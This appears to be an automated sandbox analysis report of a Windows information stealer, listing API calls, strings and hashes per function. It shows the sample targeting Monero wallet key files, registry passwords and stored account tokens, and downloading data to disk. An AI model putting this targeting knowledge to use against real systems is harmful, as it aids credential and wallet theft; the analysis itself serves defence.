                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 2a1fa46370245d052945bf4a506453a45e3427508129c40e2e9f1f9636e7b63e
                  • Instruction ID: f0814fbb93b98ba6008ad029261edff889783bda987de37504968ffc32a3805b
                  • Opcode Fuzzy Hash: 2a1fa46370245d052945bf4a506453a45e3427508129c40e2e9f1f9636e7b63e
                  • Instruction Fuzzy Hash: 52719776900208ABCB14EBA0DD96FEE7779BF48300F04459CF60997181DA78EB55DF91
                  Function 00FB1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FB12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB12B4
                    • Part of subcall function 00FB12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00FB12BB
                    • Part of subcall function 00FB12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FB12D7
                    • Part of subcall function 00FB12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FB12F5
                    • Part of subcall function 00FB12A0: RegCloseKey.ADVAPI32(?), ref: 00FB12FF
                  • lstrcat.KERNEL32(?,00000000), ref: 00FB134F
                  • lstrlen.KERNEL32(?), ref: 00FB135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00FB1377
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00C8A450,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00FB1465
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                    • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                    • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                    • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                    • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                    • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 00FB14EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 7c0e95a2df562409a2114f52c2b82723a3d25b2ba60b913607f91d054171d26c
                  • Instruction ID: fbc1808a08224817020816208fc573586efbdae158fdd11616e05be9bce53a6e
                  • Opcode Fuzzy Hash: 7c0e95a2df562409a2114f52c2b82723a3d25b2ba60b913607f91d054171d26c
                  • Instruction Fuzzy Hash: 0A5111B195011D97CB25EB60DD97FED733CAF54304F4041ACB60AA2081EE786B85DFA6
                  Function 00FB75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FB72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB733A
                    • Part of subcall function 00FB72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FB73B1
                    • Part of subcall function 00FB72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FB740D
                    • Part of subcall function 00FB72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00FB7452
                    • Part of subcall function 00FB72D0: HeapFree.KERNEL32(00000000), ref: 00FB7459
                  • lstrcat.KERNEL32(00000000,00FD17FC), ref: 00FB7606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB7648
                  • lstrcat.KERNEL32(00000000, : ), ref: 00FB765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB768F
                  • lstrcat.KERNEL32(00000000,00FD1804), ref: 00FB76A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB76D3
                  • lstrcat.KERNEL32(00000000,00FD1808), ref: 00FB76ED
                  • task.LIBCPMTD ref: 00FB76FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: f420b6868061665dc96a231e4c55222be55dc5061dd36fa8fb35b1242e02ea1c
                  • Instruction ID: f0b4de491e221acd154f78deed544f5998dc977d2c433e1d6aa6f217fe8e3746
                  • Opcode Fuzzy Hash: f420b6868061665dc96a231e4c55222be55dc5061dd36fa8fb35b1242e02ea1c
                  • Instruction Fuzzy Hash: D7314DB2900209DBCB18EBA5EC85DEE7779BF84301F14412CE116A7284DA38A986EF51
                  Function 00FC8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00C8DF90,00000000,?,00FD0E2C,00000000,?,00000000), ref: 00FC8130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00FC8158
                  • __aulldiv.LIBCMT ref: 00FC8172
                  • __aulldiv.LIBCMT ref: 00FC8180
                  • wsprintfA.USER32 ref: 00FC81AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: c77d5160bdd87b00ed9b2e92be8bd04c36e70186c9c0c0825b934167462c6028
                  • Instruction ID: 00f8227bec764aa5c044994e60427cfc4bdd326b9b026d8d146876532eb5f935
                  • Opcode Fuzzy Hash: c77d5160bdd87b00ed9b2e92be8bd04c36e70186c9c0c0825b934167462c6028
                  • Instruction Fuzzy Hash: 5F218CB1E44209ABDB14DFD4DD4AFAEB7B8FB44B10F10421DF615BB280D778A9018BA5
                  Function 00FB60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                    • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                  • InternetOpenA.WININET(00FD0DF7,00000001,00000000,00000000,00000000), ref: 00FB610F
                  • StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB6147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00FB618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00FB61B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00FB61DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FB620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00FB6249
                  • InternetCloseHandle.WININET(?), ref: 00FB6253
                  • InternetCloseHandle.WININET(00000000), ref: 00FB6260
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 4541cf59bd92c7ac95b667c4b480d551da3a26fcc99383abbaa8b3b80e1910f7
                  • Instruction ID: b65d145182a00c5ee008aadc94df76d73bf74b2ba94291cc5c644902d26f0fb9
                  • Opcode Fuzzy Hash: 4541cf59bd92c7ac95b667c4b480d551da3a26fcc99383abbaa8b3b80e1910f7
                  • Instruction Fuzzy Hash: C8518EB1900208ABEF24DF51DD45FEE77B8FF04705F1081A8A60AA71C0DB796A85DF95
                  Function 00FB72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00FB733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00FB73B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00FB740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00FB7452
                  • HeapFree.KERNEL32(00000000), ref: 00FB7459
                  • task.LIBCPMTD ref: 00FB7555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuetask
                  • String ID: Password
                  • API String ID: 775622407-3434357891
                  • Opcode ID: b66d33c03dbe9038ace781819b2810ee292cef585972a13295d1919912a2a705
                  • Instruction ID: ca6c004be3d4bf12ed9d75d0622ae9f63c8de8e69a5327280ad10a2a78b4ee86
                  • Opcode Fuzzy Hash: b66d33c03dbe9038ace781819b2810ee292cef585972a13295d1919912a2a705
                  • Instruction Fuzzy Hash: 70613BB5D04218DBDB24EB51DC41BDAB7BCBF84340F0481E9E649A6141DBB46BCADFA0
                  Function 00FBBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                  • lstrlen.KERNEL32(00000000), ref: 00FBBC9F
                    • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00FBBCCD
                  • lstrlen.KERNEL32(00000000), ref: 00FBBDA5
                  • lstrlen.KERNEL32(00000000), ref: 00FBBDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: fb89c1da0a3f09ae4bb1f766bb2946b1b60dede075dd9da8260d59b979a47bd9
                  • Instruction ID: a51ce2b73a4cf7ebe56c2d20a99202afffab2bc7b50eb761c0f66ca3273cba1f
                  • Opcode Fuzzy Hash: fb89c1da0a3f09ae4bb1f766bb2946b1b60dede075dd9da8260d59b979a47bd9
                  • Instruction Fuzzy Hash: 78B13C7191010DABDB18EBA0DE97EEE7339AF54304F40416DF506A2191EF387A49EB62
                  Function 00FC6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: b6794f2f294954c878756eb2de0bb20f6e40f75ada013123eab3e499736f3f08
                  • Instruction ID: bf75e267b24a55d6e94fc4aaaad23d767657d932b734e71f4e980dfafb790b36
                  • Opcode Fuzzy Hash: b6794f2f294954c878756eb2de0bb20f6e40f75ada013123eab3e499736f3f08
                  • Instruction Fuzzy Hash: 81F03A30908209EFD3589FE0B50AF2C7B74FF05703F0402ACE61A87284DA795A829BD5
                  Function 00FB4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FB4FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB4FD1
                  • InternetOpenA.WININET(00FD0DDF,00000000,00000000,00000000,00000000), ref: 00FB4FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FB5011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00FB5041
                  • InternetCloseHandle.WININET(?), ref: 00FB50B9
                  • InternetCloseHandle.WININET(?), ref: 00FB50C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 78851dbb05e316a93b3154b1d2f11d9a8e35b1269bdc614a0f91cac252af43f0
                  • Instruction ID: 8e4f2763b579c8e6fb8273620c7340c2ddc1f97efe29b7456092106bb28a5325
                  • Opcode Fuzzy Hash: 78851dbb05e316a93b3154b1d2f11d9a8e35b1269bdc614a0f91cac252af43f0
                  • Instruction Fuzzy Hash: F83107B5A00218ABDB24DF54DC85BDCB7B4EB48704F1081E9EA09A7284DB746AC59F98
                  Function 00FC83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FC8426
                  • wsprintfA.USER32 ref: 00FC8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FC847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC8499
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
